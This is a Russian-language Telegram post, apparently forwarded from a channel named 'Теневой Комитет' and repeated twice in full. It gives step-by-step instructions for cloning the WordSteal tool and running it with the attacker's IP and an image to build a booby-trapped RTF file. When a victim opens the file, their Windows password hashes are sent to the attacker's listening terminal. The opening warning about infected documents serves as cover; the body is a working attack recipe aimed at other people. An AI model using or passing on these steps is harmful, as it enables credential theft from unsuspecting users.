Forwarded From Теневой Комитет
https://telegra.ph/file/35174fd49a942d374d982.jpgПрячем стиллер паролей в документ
Задумывались ли вы, что при скачивании и открытии какого-либо документа, там вас может ожидать неприятная ситуация, а точнее - вирус? Если нет, то время начать проверять даже документы, а то 21 век на дворе.
А сегодня я наглядно покажу, как можно мошенники вшивают стиллер в RTF файл, с помощью утилиты WordSteal.
Когда юзер откроет такой файл, то "хакер" автоматически получает хеши паролей Виндоус.
Инструкция
1. Для начала вам потребуется
Metasploit, Linux, Termux
2. После запускаем нашу утилиту:
apt install python git
git clone https://github.com/0x09AL/WordSteal.git
cd
chmod +x main.py
3. После запуска вам понадобится какая-либо картинка. Вы должны прописать к ней абсолютный путь, либо же засунуть её в папку с скриптом и написать только её название:
python main.py ваш_IP название_картинки 1
Пример:
python main.py 128.0.0.1 komitet.jpg 1
Если всё прошло успешно, то в папке должен появится RTF с вшитой полезной нагрузкой. Терминал не нужно закрывать!
Далее этот файл должен кто-то открыть и в наш терминал придут все хеши паролей ✌
https://telegra.ph/file/35174fd49a942d374d982.jpgПрячем стиллер паролей в документ
Задумывались ли вы, что при скачивании и открытии какого-либо документа, там вас может ожидать неприятная ситуация, а точнее - вирус? Если нет, то время начать проверять даже документы, а то 21 век на дворе.
А сегодня я наглядно покажу, как можно мошенники вшивают стиллер в RTF файл, с помощью утилиты WordSteal.
Когда юзер откроет такой файл, то "хакер" автоматически получает хеши паролей Виндоус.
Инструкция
1. Для начала вам потребуется
Metasploit, Linux, Termux
2. После запускаем нашу утилиту:
apt install python git
git clone https://github.com/0x09AL/WordSteal.git
cd
chmod +x main.py
3. После запуска вам понадобится какая-либо картинка. Вы должны прописать к ней абсолютный путь, либо же засунуть её в папку с скриптом и написать только её название:
python main.py ваш_IP название_картинки 1
Пример:
python main.py 128.0.0.1 komitet.jpg 1
Если всё прошло успешно, то в папке должен появится RTF с вшитой полезной нагрузкой. Терминал не нужно закрывать!
Далее этот файл должен кто-то открыть и в наш терминал придут все хеши паролей ✌
